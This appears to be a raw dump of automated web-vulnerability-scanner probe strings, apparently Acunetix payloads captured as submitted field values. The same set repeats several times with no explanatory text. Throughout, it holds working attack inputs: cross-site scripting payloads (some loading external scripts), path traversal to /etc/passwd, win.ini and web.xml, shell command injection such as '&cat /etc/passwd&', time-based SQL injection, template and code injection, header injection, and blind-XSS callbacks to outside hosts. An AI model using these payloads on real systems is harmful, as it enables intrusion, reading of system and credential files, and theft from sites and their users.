1<ScRiPt >prompt(956680)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(912643)">

1

response.write(9060381*9571827)

1

1

1

WEB-INF/web.xml

'+response.write(9060381*9571827)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965204)"></g></svg>

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

'&cat /etc/passwd&'

"+response.write(9060381*9571827)+"

1<div style=width:expression(prompt(940940))>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<body onload=prompt(979892)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921894)>

${99617+99150}

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(937962)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n911471=v900996

1

1

1<img/src=">" onerror=alert(964949)>

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

-1)

1

)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1<ScRiPt%20>prompt(998314)</sCripT>

'|'ld

testasp.vulnweb.com

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

AvD2jJee'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

1&lt

1

1

^(#$!@#$)(()))******

YX7gHiDO')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

1

\xf6<img acu onmouseover=prompt(997929) //\xf6>

1

7akFQ7BF'))

1

1

"

/etc/passwd

1

http://hitkoliyOsYzq.bxss.me/

-1

1

'

1<input autofocus onfocus=prompt(920875)>

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

"

<a href='http://www.acunetix.com'>website security</a>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

eA9DBRXF'

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

0cEwj5lg')

1

comments

&dir

1

1'"()&%<ScRiPt >prompt(960323)</ScRiPt>

1_FDKSw <ScRiPt >prompt(931453)</ScRiPt>

1

'"

SE1r4ZAB'))

1

'&dir&'

comments/.

'"()&%<ScRiPt >prompt(951744)</ScRiPt>

1

1

1

<!--

1

file:///etc/passwd

"&dir&"

1

1_990402

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

|dir

1

1

1

WEB-INF/web.xml

'|dir

1

1

acu4926\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4926

WEB-INF\web.xml

1

1

1

1

acux9608\xc0\xbez1\xc0\xbcz2a\x90bcxuca9608

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(967539)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

1<script>prompt(961816)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(926618)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998968></ScRiPt>

1

1<ScRiPt >prompt(959843)</ScRiPt>

................windowswin.ini

1

1

1

1<video><source onerror="javascript:prompt(903974)">

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988264)"></g></svg>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<div style=width:expression(prompt(986642))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

1

response.write(9592876*9593353)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9592876*9593353)+'

1

1<body onload=prompt(937948)>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987186)>

1

"+response.write(9592876*9593353)+"

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<img src=xyz OnErRor=prompt(961545)>

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(922038)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1<ScRiPt%20>prompt(979827)</sCripT>

1

1

`cat /etc/passwd`

1

1

${100479+100272}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

1

|cat /etc/passwd#

1

1&n991741=v951678

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

\xf6<img acu onmouseover=prompt(980004) //\xf6>

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<input autofocus onfocus=prompt(975860)>

testasp.vulnweb.com

ZhT5FiKv'

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

HhxgOH0z')

1

'

'"()

[url=http://www.acunetix.com]website security[/url]

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

r3X1rLhS'))

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_DtICW <ScRiPt >prompt(922400)</ScRiPt>

"

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitS02u1UfSJf.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

&dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

http://www.acunetix.tst

1

comments

1

1

"&dir&"

1

HnC1VDVB'

'"

1

1'"()&%<ScRiPt >prompt(959546)</ScRiPt>

1

1

file:///etc/passwd

comments

|dir

kfhJqOah')

<!--

'"()&%<ScRiPt >prompt(960469)</ScRiPt>

1

'|dir

comments/.

/\../\../\../\../\../\../\../etc/passwd

1

TgDICYPg'))

1

1_937246

1

"|dir

1

WEB-INF/web.xml

1

1

1

1

1

1

acu5484\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5484

WEB-INF\web.xml

1

1

1

acux10079\xc0\xbez1\xc0\xbcz2a\x90bcxuca10079

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(980618)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<script>prompt(959074)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(974572)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988199></ScRiPt>

................windowswin.ini

1

1

1<ScRiPt >prompt(981977)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(945212)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984595)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9213248*9717207)

1

1<div style=width:expression(prompt(974037))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9213248*9717207)+'

1

1

1<iframe src='data:text/html

"+response.write(9213248*9717207)+"

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1<body onload=prompt(983999)>

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961825)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

-1

1<img src=xyz OnErRor=prompt(944036)>

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

${100483+99133}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1)

1<img/src=">" onerror=alert(904513)>

1

1

1

1

1

1

1<ScRiPt%20>prompt(956889)</sCripT>

-1))

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n954542=v927955

1

)

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1some_inexistent_file_with_long_name%00.jpg

"|"ld

aDgfi3wW'

'"()

1

\xf6<img acu onmouseover=prompt(942548) //\xf6>

1

!(()&&!|*|*|

/etc/passwd

1

8nOVWCS1')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(914055)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

testasp.vulnweb.com

tohBeDqA'))

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

"

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

"

1

-1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1_SIV1R <ScRiPt >prompt(967840)</ScRiPt>

1

http://hits19QNXkQWV.bxss.me/

comments

1

1

||cat /etc/passwd

-1)

comments

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

file:///etc/passwd

1

-1))

comments/.

1

1

1

'&dir&'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

/\../\../\../\../\../\../\../etc/passwd

k7k4Hla1'

1

1

http://www.acunetix.tst

"&dir&"

1

1

GgwFTZXd')

WEB-INF/web.xml

1

1

1

'"

1

1'"()&%<ScRiPt >prompt(987165)</ScRiPt>

|dir

1

1

<!--

1

WEB-INF\web.xml

LEmNYNtm'))

'|dir

'"()&%<ScRiPt >prompt(984657)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1_990302

"|dir

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4734\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4734

1

1

1

................windowswin.ini

acux4226\xc0\xbez1\xc0\xbcz2a\x90bcxuca4226

1

1

1<ScRiPt >prompt(926510)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(906897)</script>

1

1<ScRiPt >prompt(912899)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988529></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(900971)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(965762)">

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936325)"></g></svg>

1

1

response.write(9977935*9528289)

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(940208))>

'+response.write(9977935*9528289)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<iframe src='data:text/html

"+response.write(9977935*9528289)+"

1

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1<body onload=prompt(922067)>

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(960335)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

`cat /etc/passwd`

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(958691)>

-1)

|cat /etc/passwd#

1

${99262+99038}

1

1<img/src=">" onerror=alert(942586)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

1

1

'|'ld

1

1<ScRiPt%20>prompt(952007)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

1&n945932=v902733

o1Cu8nw3'

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1&lt

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

!(()&&!|*|*|

rgAZzoHe')

\xf6<img acu onmouseover=prompt(973094) //\xf6>

testasp.vulnweb.com

1

/etc/passwd

1

'

ULoXaWiq'))

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(981694)>

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

-1

1

"

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

http://hit1rokoGF0ne.bxss.me/

-1))

1

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

'&dir&'

1

1_mSFR7 <ScRiPt >prompt(986037)</ScRiPt>

DqST34aM'

1

1

1

1

1

"&dir&"

hhDKWpzS')

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

http://www.acunetix.tst

1

1

1

anSxqrOD'))

|dir

1

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1

comments

1

'|dir

1'"()&%<ScRiPt >prompt(959402)</ScRiPt>

1

<!--

1

comments/.

1

WEB-INF/web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(929800)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

1

1_904635

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu7003\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7003

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6215\xc0\xbez1\xc0\xbcz2a\x90bcxuca6215

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(969827)</ScRiPt>

................windowswin.ini

1

1

1<script>prompt(975444)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(990107)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961880></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(929767)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(983114)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954272)"></g></svg>

1

1

1<div style=width:expression(prompt(966525))>

1

WEB-INF/web.xml

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

1<body onload=prompt(974864)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904515)>

1

1<img src=xyz OnErRor=prompt(974980)>

1

1<img/src=">" onerror=alert(976876)>

1

1

1

1<ScRiPt%20>prompt(997291)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(924251) //\xf6>

1<input autofocus onfocus=prompt(963319)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_IWQVE <ScRiPt >prompt(916120)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9201200*9638913)

1

1

'+response.write(9201200*9638913)+'

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9201200*9638913)+"

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

${99504+99970}

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

-1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n925860=v958812

)

|cat /etc/passwd#

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

'|'ld

testasp.vulnweb.com

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

'"()

ohAqCCOr'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

'

1

1

/etc/passwd

JFwf97JK')

http://hitjgy6IPhusW.bxss.me/

1

1

"

'

acunetix_wvs_invalid_filename

1

ibt3QnRC'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

comments

1

"

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1)

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

<!--

1

comments/.

1'"()&%<ScRiPt >prompt(953936)</ScRiPt>

&dir

1

1

q2P6UQ7o'

1

'"()&%<ScRiPt >prompt(982930)</ScRiPt>

file:///etc/passwd

LHC2S9OH')

1

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

1_998869

fuN3Ds7X'))

1

1

"&dir&"

1

WEB-INF/web.xml

1

1

|dir

acu1914\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1914

WEB-INF\web.xml

1

'|dir

1

../../../../../../../../../../windows/win.ini

acux4421\xc0\xbez1\xc0\xbcz2a\x90bcxuca4421

"|dir

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(907580)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(953836)</script>

1

1

1<ScRiPt >prompt(921921)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997781></ScRiPt>

................windowswin.ini

1<ScRiPt >prompt(929186)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(963201)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903087)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9078449*9331759)

1

1<div style=width:expression(prompt(923785))>

1

1

&cat /etc/passwd&

'+response.write(9078449*9331759)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9078449*9331759)+"

'&cat /etc/passwd&'

1<body onload=prompt(900207)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(965392)>

"&cat /etc/passwd&"

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(924042)>

1

1

WEB-INF\web.xml

1

cat /etc/passwd

${99945+100198}

1<img/src=">" onerror=alert(969384)>

../../../../../../../../../../etc/passwd.jpg

1

-1

`cat /etc/passwd`

1

1

1

1

1<ScRiPt%20>prompt(984086)</sCripT>

|cat /etc/passwd#

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n921767=v903942

1

1&lt

1

'|'ld

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

)

1

1

1

"|"ld

\xf6<img acu onmouseover=prompt(954283) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

ag7nOW9P'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'"()

1<input autofocus onfocus=prompt(913313)>

1

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

N9eckj7P')

1

"

1

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

AQw1qYLc'))

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

1_peCVw <ScRiPt >prompt(948127)</ScRiPt>

1

1

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

&dir

http://hit2LO4Vzrmtr.bxss.me/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

acunetix_wvs_invalid_filename

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

q7qUXXB9'

1

http://www.acunetix.tst

1

1

1

"&dir&"

'"

comments

1

1'"()&%<ScRiPt >prompt(950942)</ScRiPt>

oaTWou9g')

file:///etc/passwd

1

|dir

comments/.

1

<!--

'"()&%<ScRiPt >prompt(986550)</ScRiPt>

'|dir

63wEqlYe'))

/\../\../\../\../\../\../\../etc/passwd

1_925664

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

acu8026\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8026

1

WEB-INF\web.xml

1

1

acux9684\xc0\xbez1\xc0\xbcz2a\x90bcxuca9684

1

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(945033)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(941683)</script>

1

1

1

1<ScRiPt >prompt(926348)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948489></ScRiPt>

1

1

